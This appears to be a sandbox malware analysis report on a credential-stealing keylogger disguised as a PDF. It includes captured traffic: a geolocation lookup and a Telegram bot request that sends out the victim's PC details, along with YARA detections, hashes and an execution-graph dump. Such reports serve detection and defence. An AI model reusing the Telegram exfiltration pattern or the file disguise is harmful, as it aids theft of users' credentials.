Dec 18, 2024 00:30:52.839638948 CET | 697 | IN | HTTP/1.1 504 Gateway Time-out
Date: Tue, 17 Dec 2024 23:30:52 GMT
Content-Type: text/html
Content-Length: 557
Connection: keep-alive
Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49719 | 172.67.177.134 | 443 | 5908 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 23:30:26 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-12-17 23:30:26 UTC | 878 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 23:30:26 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 466995
Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ALGJmEYulqEzxrgtQcBGnXEbFn%2Bf7RrDuoMXri%2Fb7UrO6ihRkoDGThffpumCSiUO7oJDzav4DxEsPs15Ha7IOJOQEyMErNWTNBBESi%2FQWsIbte0ti%2Fnq83VRAWGfdyixaMHmku2L"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3ab3737f2c7d0c-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2016&min_rtt=2009&rtt_var=768&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1410628&cwnd=156&unsent_bytes=0&cid=a646050f7f3b0e72&ts=460&x=0"
2024-12-17 23:30:26 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49727 | 172.67.177.134 | 443 | 5908 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 23:30:29 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2024-12-17 23:30:29 UTC | 882 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 23:30:29 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 466998
Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=31tFAPMz%2BTWHxEoDqnxesOdiVcLzf635JKQ%2BeizKQzk1xAt%2B7HK%2Fq%2BLIgFOW8BoGQlqXpU13RFIkACsONkQwzm3CCZtBLpAUeYhiZQmoUs7F9Y9GqjmKqiXa3wto%2FH0urIbrBtBF"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3ab3879fe3729f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1808&rtt_var=696&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1551540&cwnd=169&unsent_bytes=0&cid=923dcc652d07dba5&ts=561&x=0"
2024-12-17 23:30:29 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49763 | 172.67.177.134 | 443 | 5908 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 23:30:43 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-12-17 23:30:43 UTC | 874 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 23:30:43 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 467012
Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yoz69ZF%2BCBjdFjFDHwrAhHpf9JDgrf2M%2Flo25LnAQ3eERQRXzWjLap0LozFIN8IuJ9peg6mBJCB6qd8jcdIXmoyB19CUT2MkwyASlppvwmzPXK6uexrHw0wDClMHd0zrZMgNngUi"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3ab3de891f19b6-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2044&min_rtt=2025&rtt_var=798&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1338835&cwnd=170&unsent_bytes=0&cid=a16067a412293f42&ts=460&x=0"
2024-12-17 23:30:43 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49791 | 149.154.167.220 | 443 | 5908 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 23:30:54 UTC | 334 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20and%20Time:%2018/12/2024%20/%2023:50:08%0D%0ACountry%20Name:%20%0D%0A%5B%20887849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-12-17 23:30:54 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Tue, 17 Dec 2024 23:30:54 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 23:30:54 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}



Target ID: 0
Start time: 18:30:04
Start date: 17/12/2024
Path: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe"
Imagebase: 0x750000
File size: 1'006'592 bytes
MD5 hash: 6897B3D43AF4ACA3376A79D7169746DB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
• Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

Target ID: 2
Start time: 18:30:05
Start date: 17/12/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe"
Imagebase: 0xa80000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4548549275.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false


                                                                                                          Execution Graph

                                                                                                          Execution Coverage:3.8%
                                                                                                          Dynamic/Decrypted Code Coverage:0.4%
                                                                                                          Signature Coverage:8%
                                                                                                          Total number of Nodes:2000
                                                                                                          Total number of Limit Nodes:193
                                                                                                          execution_graph: the interactive node/edge listing of this graph (2000 nodes, 193 limit nodes, see the counts above) is rendered by the report viewer and is not reproduced here as text. The Windows API calls named on the graph nodes are: AllocateAndInitializeSid, CheckTokenMembership, CloseHandle, CreateFileW, CreateStreamOnHGlobal, CreateWindowExW, DecodePointer, DispatchMessageW, EncodePointer, EnterCriticalSection, EnumResourceNamesW, ExitProcess, FindResourceExW, FreeEnvironmentStringsW, FreeLibrary, FreeSid, GetClassLongW, GetCommandLineW, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeProcess, GetFileType, GetFullPathNameW, GetLastError, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOpenFileNameW, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetSysColorBrush, GetSystemTimeAsFileTime, HeapAlloc, InitializeCriticalSectionAndSpinCount, IsDebuggerPresent, IsDialogMessageW, IsProcessorFeaturePresent, IsThemeActive, LeaveCriticalSection, LoadCursorW, LoadIconW, LoadImageW, LoadLibraryA, LoadLibraryExW, LoadResource, LockResource, MessageBoxA, PeekMessageW, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, RegCloseKey, RegOpenKeyExW, RegQueryValueExW, RegisterClassExW, RtlAllocateHeap, RtlFreeHeap, SetCurrentDirectoryW, SetUnhandledExceptionFilter, Shell_NotifyIconW, ShowWindow, SizeofResource, Sleep, SystemParametersInfoW, TerminateProcess, timeGetTime, TlsAlloc, TlsSetValue, TranslateAcceleratorW, TranslateMessage, UnhandledExceptionFilter, VariantClear, WaitForSingleObject. The remaining nodes are C runtime internals (e.g. __lock, _doexit, __wsopen_nolock, __getptd_noexit, __cftoe_l) and the sample's own functions at 0x75xxxx-0x7dxxxx addresses.
102474->102570 102476 774700 102476->102460 102478 780e7c 102477->102478 102479 780e93 102477->102479 102580 778af4 58 API calls __getptd_noexit 102478->102580 102481 7815cb 102479->102481 102485 780ecd 102479->102485 102596 778af4 58 API calls __getptd_noexit 102481->102596 102482 780e81 102581 778b28 58 API calls __getptd_noexit 102482->102581 102487 780ed5 102485->102487 102493 780eec 102485->102493 102486 7815d0 102597 778b28 58 API calls __getptd_noexit 102486->102597 102582 778af4 58 API calls __getptd_noexit 102487->102582 102489 780ee1 102598 778db6 9 API calls __cftoe_l 102489->102598 102491 780eda 102583 778b28 58 API calls __getptd_noexit 102491->102583 102494 780f01 102493->102494 102496 780f1b 102493->102496 102498 780f39 102493->102498 102525 780e88 102493->102525 102584 778af4 58 API calls __getptd_noexit 102494->102584 102496->102494 102502 780f26 102496->102502 102585 77881d 58 API calls 2 library calls 102498->102585 102500 780f49 102503 780f6c 102500->102503 102504 780f51 102500->102504 102571 785c6b 102502->102571 102588 7818c1 60 API calls 3 library calls 102503->102588 102586 778b28 58 API calls __getptd_noexit 102504->102586 102505 78103a 102507 7810b3 ReadFile 102505->102507 102512 781050 GetConsoleMode 102505->102512 102510 781593 GetLastError 102507->102510 102511 7810d5 102507->102511 102509 780f56 102587 778af4 58 API calls __getptd_noexit 102509->102587 102514 7815a0 102510->102514 102515 781093 102510->102515 102511->102510 102519 7810a5 102511->102519 102516 7810b0 102512->102516 102517 781064 102512->102517 102594 778b28 58 API calls __getptd_noexit 102514->102594 102527 781099 102515->102527 102589 778b07 58 API calls 3 library calls 102515->102589 102516->102507 102517->102516 102520 78106a ReadConsoleW 102517->102520 102519->102527 102528 78110a 102519->102528 102537 781377 102519->102537 102520->102519 102522 78108d GetLastError 102520->102522 102521 7815a5 102595 778af4 58 API calls __getptd_noexit 102521->102595 102522->102515 
102525->102460 102526 772d55 _free 58 API calls 102526->102525 102527->102525 102527->102526 102529 781176 ReadFile 102528->102529 102535 7811f7 102528->102535 102531 781197 GetLastError 102529->102531 102539 7811a1 102529->102539 102531->102539 102532 7812b4 102541 781264 MultiByteToWideChar 102532->102541 102592 7818c1 60 API calls 3 library calls 102532->102592 102533 7812a4 102591 778b28 58 API calls __getptd_noexit 102533->102591 102534 78147d ReadFile 102538 7814a0 GetLastError 102534->102538 102544 7814ae 102534->102544 102535->102527 102535->102532 102535->102533 102535->102541 102537->102527 102537->102534 102538->102544 102539->102528 102590 7818c1 60 API calls 3 library calls 102539->102590 102541->102522 102541->102527 102544->102537 102593 7818c1 60 API calls 3 library calls 102544->102593 102546 780bb2 102545->102546 102547 780bc7 102545->102547 102632 778b28 58 API calls __getptd_noexit 102546->102632 102551 780bfc 102547->102551 102557 780bc2 102547->102557 102634 785fe4 58 API calls __malloc_crt 102547->102634 102549 780bb7 102633 778db6 9 API calls __cftoe_l 102549->102633 102553 7746e6 __ftell_nolock 58 API calls 102551->102553 102554 780c10 102553->102554 102599 780d47 102554->102599 102556 780c17 102556->102557 102558 7746e6 __ftell_nolock 58 API calls 102556->102558 102557->102460 102559 780c3a 102558->102559 102559->102557 102560 7746e6 __ftell_nolock 58 API calls 102559->102560 102561 780c46 102560->102561 102561->102557 102562 7746e6 __ftell_nolock 58 API calls 102561->102562 102563 780c53 102562->102563 102564 7746e6 __ftell_nolock 58 API calls 102563->102564 102564->102557 102565->102466 102566->102454 102567->102460 102568->102466 102569->102474 102570->102476 102572 785c83 102571->102572 102573 785c76 102571->102573 102575 785c8f 102572->102575 102576 778b28 __cftoe_l 58 API calls 102572->102576 102574 778b28 __cftoe_l 58 API calls 102573->102574 102577 785c7b 102574->102577 102575->102505 102578 785cb0 102576->102578 102577->102505 
102579 778db6 __cftoe_l 9 API calls 102578->102579 102579->102577 102580->102482 102581->102525 102582->102491 102583->102489 102584->102491 102585->102500 102586->102509 102587->102525 102588->102502 102589->102527 102590->102539 102591->102527 102592->102541 102593->102544 102594->102521 102595->102527 102596->102486 102597->102489 102598->102525 102600 780d53 type_info::_Type_info_dtor 102599->102600 102601 780d60 102600->102601 102602 780d77 102600->102602 102603 778af4 __chsize_nolock 58 API calls 102601->102603 102604 780e3b 102602->102604 102607 780d8b 102602->102607 102606 780d65 102603->102606 102605 778af4 __chsize_nolock 58 API calls 102604->102605 102614 780dae 102605->102614 102608 778b28 __cftoe_l 58 API calls 102606->102608 102609 780da9 102607->102609 102610 780db6 102607->102610 102621 780d6c type_info::_Type_info_dtor 102608->102621 102611 778af4 __chsize_nolock 58 API calls 102609->102611 102612 780dd8 102610->102612 102613 780dc3 102610->102613 102611->102614 102616 77d206 ___lock_fhandle 59 API calls 102612->102616 102615 778af4 __chsize_nolock 58 API calls 102613->102615 102617 778b28 __cftoe_l 58 API calls 102614->102617 102618 780dc8 102615->102618 102619 780dde 102616->102619 102620 780dd0 102617->102620 102622 778b28 __cftoe_l 58 API calls 102618->102622 102623 780df1 102619->102623 102624 780e04 102619->102624 102626 778db6 __cftoe_l 9 API calls 102620->102626 102621->102556 102622->102620 102625 780e5b __read_nolock 70 API calls 102623->102625 102627 778b28 __cftoe_l 58 API calls 102624->102627 102629 780dfd 102625->102629 102626->102621 102628 780e09 102627->102628 102630 778af4 __chsize_nolock 58 API calls 102628->102630 102631 780e33 __read LeaveCriticalSection 102629->102631 102630->102629 102631->102621 102632->102549 102633->102557 102634->102551 102638 77520a GetSystemTimeAsFileTime 102635->102638 102637 7b8f6e 102637->102227 102639 775238 __aulldiv 102638->102639 102639->102637 102641 775c6c type_info::_Type_info_dtor 
102640->102641 102642 775c93 102641->102642 102643 775c7e 102641->102643 102644 776c11 __lock_file 59 API calls 102642->102644 102654 778b28 58 API calls __getptd_noexit 102643->102654 102647 775c99 102644->102647 102646 775c83 102655 778db6 9 API calls __cftoe_l 102646->102655 102656 7758d0 67 API calls 5 library calls 102647->102656 102650 775ca4 102657 775cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 102650->102657 102652 775cb6 102653 775c8e type_info::_Type_info_dtor 102652->102653 102653->102232 102654->102646 102655->102653 102656->102650 102657->102652 102659 757f9a _memmove 102658->102659 102660 757f87 102658->102660 102659->102085 102660->102659 102661 770db6 Mailbox 59 API calls 102660->102661 102661->102659 102662->102092 102663->102106 102664->102108 102665->102105 102666->102114 102668 759169 Mailbox 102667->102668 102669 78f19f 102668->102669 102674 759173 102668->102674 102670 770db6 Mailbox 59 API calls 102669->102670 102672 78f1ab 102670->102672 102671 75917a 102671->102118 102674->102671 102675 759c90 59 API calls Mailbox 102674->102675 102675->102674 102676->102124 102677->102129 102683 7b9748 __tzset_nolock _wcscmp 102678->102683 102679 754f0b 74 API calls 102679->102683 102680 7b95dc 102680->102135 102680->102163 102681 7b9109 GetSystemTimeAsFileTime 102681->102683 102682 754ee5 85 API calls 102682->102683 102683->102679 102683->102680 102683->102681 102683->102682 102685 7b8b11 102684->102685 102686 7b8b1f 102684->102686 102687 77525b 115 API calls 102685->102687 102688 7b8b64 102686->102688 102689 77525b 115 API calls 102686->102689 102714 7b8b28 102686->102714 102687->102686 102715 7b8d91 102688->102715 102691 7b8b49 102689->102691 102691->102688 102693 7b8b52 102691->102693 102692 7b8ba8 102694 7b8bcd 102692->102694 102698 7b8bac 102692->102698 102695 7753a6 __fcloseall 83 API calls 102693->102695 102693->102714 102719 7b89a9 102694->102719 102695->102714 102697 7b8bb9 102703 7753a6 __fcloseall 83 API calls 102697->102703 
102697->102714 102698->102697 102700 7753a6 __fcloseall 83 API calls 102698->102700 102700->102697 102701 7b8bfb 102728 7b8c2b 102701->102728 102702 7b8bdb 102704 7b8be8 102702->102704 102706 7753a6 __fcloseall 83 API calls 102702->102706 102703->102714 102709 7753a6 __fcloseall 83 API calls 102704->102709 102704->102714 102706->102704 102709->102714 102711 7b8c16 102713 7753a6 __fcloseall 83 API calls 102711->102713 102711->102714 102713->102714 102714->102164 102716 7b8db6 102715->102716 102718 7b8d9f __tzset_nolock _memmove 102715->102718 102717 7755e2 __fread_nolock 74 API calls 102716->102717 102717->102718 102718->102692 102720 77571c __crtLCMapStringA_stat 58 API calls 102719->102720 102721 7b89b8 102720->102721 102722 77571c __crtLCMapStringA_stat 58 API calls 102721->102722 102723 7b89cc 102722->102723 102724 77571c __crtLCMapStringA_stat 58 API calls 102723->102724 102725 7b89e0 102724->102725 102726 7b8d0d 58 API calls 102725->102726 102727 7b89f3 102725->102727 102726->102727 102727->102701 102727->102702 102732 7b8c40 102728->102732 102729 7b8cf8 102761 7b8f35 102729->102761 102731 7b8a05 74 API calls 102731->102732 102732->102729 102732->102731 102735 7b8c02 102732->102735 102757 7b8e12 102732->102757 102765 7b8aa1 74 API calls 102732->102765 102736 7b8d0d 102735->102736 102737 7b8d1a 102736->102737 102738 7b8d20 102736->102738 102740 772d55 _free 58 API calls 102737->102740 102739 7b8d31 102738->102739 102741 772d55 _free 58 API calls 102738->102741 102742 7b8c09 102739->102742 102743 772d55 _free 58 API calls 102739->102743 102740->102738 102741->102739 102742->102711 102744 7753a6 102742->102744 102743->102742 102745 7753b2 type_info::_Type_info_dtor 102744->102745 102746 7753c6 102745->102746 102747 7753de 102745->102747 102814 778b28 58 API calls __getptd_noexit 102746->102814 102749 776c11 __lock_file 59 API calls 102747->102749 102753 7753d6 type_info::_Type_info_dtor 102747->102753 102751 7753f0 102749->102751 102750 7753cb 102815 778db6 9 API 
calls __cftoe_l 102750->102815 102798 77533a 102751->102798 102753->102711 102758 7b8e21 102757->102758 102759 7b8e61 102757->102759 102758->102732 102759->102758 102766 7b8ee8 102759->102766 102762 7b8f53 102761->102762 102763 7b8f42 102761->102763 102762->102735 102764 774863 80 API calls 102763->102764 102764->102762 102765->102732 102767 7b8f25 102766->102767 102768 7b8f14 102766->102768 102767->102759 102770 774863 102768->102770 102771 77486f type_info::_Type_info_dtor 102770->102771 102772 7748a5 102771->102772 102773 77488d 102771->102773 102774 77489d type_info::_Type_info_dtor 102771->102774 102775 776c11 __lock_file 59 API calls 102772->102775 102795 778b28 58 API calls __getptd_noexit 102773->102795 102774->102767 102777 7748ab 102775->102777 102783 77470a 102777->102783 102778 774892 102796 778db6 9 API calls __cftoe_l 102778->102796 102786 774719 102783->102786 102789 774737 102783->102789 102784 774727 102785 778b28 __cftoe_l 58 API calls 102784->102785 102787 77472c 102785->102787 102786->102784 102786->102789 102792 774751 _memmove 102786->102792 102788 778db6 __cftoe_l 9 API calls 102787->102788 102788->102789 102797 7748dd LeaveCriticalSection LeaveCriticalSection __wfsopen 102789->102797 102790 77ae1e __flsbuf 78 API calls 102790->102792 102791 774a3d __flush 78 API calls 102791->102792 102792->102789 102792->102790 102792->102791 102793 7746e6 __ftell_nolock 58 API calls 102792->102793 102794 77d886 __write 78 API calls 102792->102794 102793->102792 102794->102792 102795->102778 102796->102774 102797->102774 102799 77535d 102798->102799 102800 775349 102798->102800 102802 775359 102799->102802 102817 774a3d 102799->102817 102853 778b28 58 API calls __getptd_noexit 102800->102853 102816 775415 LeaveCriticalSection LeaveCriticalSection __wfsopen 102802->102816 102803 77534e 102854 778db6 9 API calls __cftoe_l 102803->102854 102809 7746e6 __ftell_nolock 58 API calls 102810 775377 102809->102810 102827 780a02 102810->102827 102812 77537d 
102812->102802 102813 772d55 _free 58 API calls 102812->102813 102813->102802 102814->102750 102815->102753 102816->102753 102818 774a74 102817->102818 102819 774a50 102817->102819 102823 780b77 102818->102823 102819->102818 102820 7746e6 __ftell_nolock 58 API calls 102819->102820 102821 774a6d 102820->102821 102855 77d886 102821->102855 102824 775371 102823->102824 102825 780b84 102823->102825 102824->102809 102825->102824 102826 772d55 _free 58 API calls 102825->102826 102826->102824 102828 780a0e type_info::_Type_info_dtor 102827->102828 102829 780a1b 102828->102829 102830 780a32 102828->102830 102980 778af4 58 API calls __getptd_noexit 102829->102980 102832 780abd 102830->102832 102835 780a42 102830->102835 102985 778af4 58 API calls __getptd_noexit 102832->102985 102834 780a20 102981 778b28 58 API calls __getptd_noexit 102834->102981 102836 780a6a 102835->102836 102837 780a60 102835->102837 102841 77d206 ___lock_fhandle 59 API calls 102836->102841 102982 778af4 58 API calls __getptd_noexit 102837->102982 102838 780a65 102986 778b28 58 API calls __getptd_noexit 102838->102986 102843 780a70 102841->102843 102845 780a8e 102843->102845 102846 780a83 102843->102846 102844 780ac9 102987 778db6 9 API calls __cftoe_l 102844->102987 102983 778b28 58 API calls __getptd_noexit 102845->102983 102965 780add 102846->102965 102849 780a27 type_info::_Type_info_dtor 102849->102812 102851 780a89 102984 780ab5 LeaveCriticalSection __unlock_fhandle 102851->102984 102853->102803 102854->102802 102856 77d892 type_info::_Type_info_dtor 102855->102856 102857 77d8b6 102856->102857 102858 77d89f 102856->102858 102860 77d955 102857->102860 102862 77d8ca 102857->102862 102956 778af4 58 API calls __getptd_noexit 102858->102956 102962 778af4 58 API calls __getptd_noexit 102860->102962 102861 77d8a4 102957 778b28 58 API calls __getptd_noexit 102861->102957 102865 77d8f2 102862->102865 102866 77d8e8 102862->102866 102883 77d206 102865->102883 102958 778af4 58 API calls __getptd_noexit 
102866->102958 102869 77d8ed 102963 778b28 58 API calls __getptd_noexit 102869->102963 102870 77d8f8 102872 77d91e 102870->102872 102873 77d90b 102870->102873 102959 778b28 58 API calls __getptd_noexit 102872->102959 102892 77d975 102873->102892 102874 77d961 102964 778db6 9 API calls __cftoe_l 102874->102964 102878 77d917 102961 77d94d LeaveCriticalSection __unlock_fhandle 102878->102961 102879 77d8ab type_info::_Type_info_dtor 102879->102818 102880 77d923 102960 778af4 58 API calls __getptd_noexit 102880->102960 102884 77d212 type_info::_Type_info_dtor 102883->102884 102885 77d261 EnterCriticalSection 102884->102885 102887 779c0b __lock 58 API calls 102884->102887 102886 77d287 type_info::_Type_info_dtor 102885->102886 102886->102870 102888 77d237 102887->102888 102889 779e2b __ioinit InitializeCriticalSectionAndSpinCount 102888->102889 102891 77d24f 102888->102891 102889->102891 102890 77d28b ___lock_fhandle LeaveCriticalSection 102890->102885 102891->102890 102893 77d982 __ftell_nolock 102892->102893 102894 77d9c1 102893->102894 102895 77d9e0 102893->102895 102926 77d9b6 102893->102926 102897 778af4 __chsize_nolock 58 API calls 102894->102897 102900 77da38 102895->102900 102901 77da1c 102895->102901 102896 77c5f6 __crtLCMapStringA_stat 6 API calls 102898 77e1d6 102896->102898 102899 77d9c6 102897->102899 102898->102878 102902 778b28 __cftoe_l 58 API calls 102899->102902 102903 77da51 102900->102903 102906 7818c1 __lseeki64_nolock 60 API calls 102900->102906 102904 778af4 __chsize_nolock 58 API calls 102901->102904 102905 77d9cd 102902->102905 102907 785c6b __flswbuf 58 API calls 102903->102907 102908 77da21 102904->102908 102910 778db6 __cftoe_l 9 API calls 102905->102910 102906->102903 102911 77da5f 102907->102911 102909 778b28 __cftoe_l 58 API calls 102908->102909 102912 77da28 102909->102912 102910->102926 102913 77ddb8 102911->102913 102919 7799ac _wcstok 58 API calls 102911->102919 102914 778db6 __cftoe_l 9 API calls 102912->102914 102915 77ddd6 
102913->102915 102916 77e14b WriteFile 102913->102916 102914->102926 102917 77defa 102915->102917 102924 77ddec 102915->102924 102918 77ddab GetLastError 102916->102918 102928 77dd78 102916->102928 102929 77dfef 102917->102929 102931 77df05 102917->102931 102918->102928 102921 77da8b GetConsoleMode 102919->102921 102920 77e184 102920->102926 102927 778b28 __cftoe_l 58 API calls 102920->102927 102921->102913 102922 77daca 102921->102922 102922->102913 102923 77dada GetConsoleCP 102922->102923 102923->102920 102953 77db09 102923->102953 102924->102920 102925 77de5b WriteFile 102924->102925 102925->102918 102930 77de98 102925->102930 102926->102896 102932 77e1b2 102927->102932 102928->102920 102928->102926 102933 77ded8 102928->102933 102929->102920 102934 77e064 WideCharToMultiByte 102929->102934 102930->102924 102935 77debc 102930->102935 102931->102920 102936 77df6a WriteFile 102931->102936 102937 778af4 __chsize_nolock 58 API calls 102932->102937 102938 77dee3 102933->102938 102939 77e17b 102933->102939 102934->102918 102949 77e0ab 102934->102949 102935->102928 102936->102918 102941 77dfb9 102936->102941 102937->102926 102942 778b28 __cftoe_l 58 API calls 102938->102942 102940 778b07 __dosmaperr 58 API calls 102939->102940 102940->102926 102941->102928 102941->102931 102941->102935 102943 77dee8 102942->102943 102945 778af4 __chsize_nolock 58 API calls 102943->102945 102944 77e0b3 WriteFile 102947 77e106 GetLastError 102944->102947 102944->102949 102945->102926 102946 7735f5 __write_nolock 58 API calls 102946->102953 102947->102949 102948 7862ba 60 API calls __write_nolock 102948->102953 102949->102928 102949->102929 102949->102935 102949->102944 102950 787a5e WriteConsoleW CreateFileW __putwch_nolock 102954 77dc5f 102950->102954 102951 77dbf2 WideCharToMultiByte 102951->102928 102952 77dc2d WriteFile 102951->102952 102952->102918 102952->102954 102953->102928 102953->102946 102953->102948 102953->102951 102953->102954 102954->102918 102954->102928 102954->102950 
